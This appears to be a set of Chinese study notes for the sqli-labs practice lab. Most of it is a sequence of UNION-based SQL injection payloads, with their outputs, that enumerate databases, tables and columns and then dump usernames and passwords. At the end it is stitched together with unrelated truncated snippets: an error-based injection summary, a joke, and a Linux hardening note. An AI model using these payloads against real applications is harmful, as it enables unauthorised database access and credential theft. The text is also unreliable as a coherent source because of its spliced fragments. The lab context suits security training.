less-1:
id=1' or 1=1 --+;判斷是否有注入
select * from users order by 1 :對欄位裡面第一列進行排序
select * from users order by 2 :對欄位裡面第二列進行排序
select * from users order by 3 :對欄位裡面第三列進行排序
id=1' order by 1 --+ ;然後依次測試2,3,4,以測試資料庫列數
id=-1' union select 1,2,3 --+ 測試可以回顯的列數字置
id=-1' union select 1,2,schema_name from information_schema.schemata limit 0,1--+
id=-1' union select 1,2,group_concat(schema_name)from information_schema.schemata --+
因為只有兩列回顯,所以將最後一部分拼接顯示,以展示出所有的庫名
id=-1' union select 1,2,group_concat(table_name)from information_schema.tables where table_ schema="security" --+
調查表名:emails,referers,uagents,users
id=-1' union select 1,2,group_concat(column_name)from information_schema.columns where table_name="users" --+
id,username,password
id=-1' union select 1,2,group_concat(concat_ws("~",username,password)) from security.users --+
id=1 order by 3 --+ 查詢出列數為3
id=-1 union select 1,2,3 查詢出可回顯位置
id=-1 union select 1,2,schema_name from information_schema.schemata
查詢出第乙個庫名:information_schema
id=-1 union select 1,2,group_concat(schema_name)from information_schema.schemata
查詢所有庫:information_schema,challenges,mysql,performance_schema,security,test
id=-1 union select 1,2,group_concat(table_name)from information_schema.tables where table_schema="security"
查詢所有表名:emails,referers,uagents,users
id=-1 union select 1,2,group_concat(column_name)from information_schema.columns where table_name="users"
查詢所有列名:id,username,password
id=-1 union select 1,2,group_concat(concat_ws("~",username,password))from security.users
id=1') or 1=1 --+ 測試出可以注入
id=1') order by 3 --+ 查詢出列數為3
id=-1') union select 1,2,3 --+ 查詢出可以回顯的位置
id=-1') union select 1,2,group_concat(schema_name) from information_schema.schemata --+
查詢出所有庫名:information_schema,challenges,mysql,performance_schema,security,test
id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security" --+
查詢出所有表名:emails,referers,uagents,users
id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name="users" --+
查詢出所有列名:id,username,password
id=-1') union select 1,2,group_concat(concat_ws("~",username,password)) from security.users --+
id=1") or 1=1 --+ 測試出可以注入
id=1") order by 3 --+ 查詢出列數為3
id=-1") union select 1,2,group_concat(schema_name)from information_schema.schemata --+
查詢出所有庫名:information_schema,challenges,mysql,performance_schema,security,test
id=-1") union select 1,2,group_concat(table_name)from information_schema.tables where table_schema="security" --+
查詢出所有的表名:emails,referers,uagents,users
id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name="users" --+
查詢出所有列名:id,username,password
id=-1")union select 1,2,group_concat(concat_ws("~",username,password)) from security.users --+
sql labs第十三題,十四題
從錯誤資訊判斷,提交的引數需要閉合單引號和括號 提交如下內容 or 1 1 成功登入 關於 mysql顯錯注入 通過updatexml函式,執行sql語句 通過extractvalue函式,執行sql語句 通過floor函式,執行sql語句 通過group by重複鍵衝突顯錯 根據登入狀態推斷資料 ...
現代笑話14
爸爸是球 王老先生70大壽,兒女都來祝賀。在席上王老先生致辭 爸爸好像乙個球,當他的使用價值最高時,兒女們你爭我奪,此時是籃球 退休以後,兒女們你推過來,我推過去,此時是排球 到年高體衰時,行動不 便時,兒女們我一腳,你一腳,踢來踢去,此時是足球。這時,他的兒女們忙說 爸爸,您是橄欖球,我們就是摔得...
14 安全加固
一.賬號安全 1.賬號鎖定 passwd l scu passwd u scu 本質 在 etc shadow密碼列前增加 口令策略 vi etc login.defs pass max days 90 密碼最長使用天數 pass min days 0 pass warn age 7 密碼到期提前預...